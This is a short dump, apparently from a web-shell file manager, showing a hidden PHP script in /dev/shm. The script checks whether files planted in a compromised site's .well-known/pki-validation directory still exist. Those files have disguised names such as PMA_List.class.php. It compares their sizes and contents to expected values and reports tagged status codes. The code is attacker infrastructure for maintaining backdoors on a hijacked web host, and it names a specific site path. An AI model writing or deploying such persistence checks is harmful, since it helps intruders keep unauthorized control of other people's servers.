Current Path : /dev/shm/ |
Current File : //dev/shm/.symbol |
<?php $r = '/home/tokomrjk/harveybenge.com'; $x = ["/.well-known/pki-validation/PMA_List.class.php"=>"bd@@250483683@@534", "/.well-known/pki-validation/Percentage.php"=>"bd@@250513264@@batch_process", "/.well-known/pki-validation/PMA_List.class.php"=>"bd@@250516345@@66"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');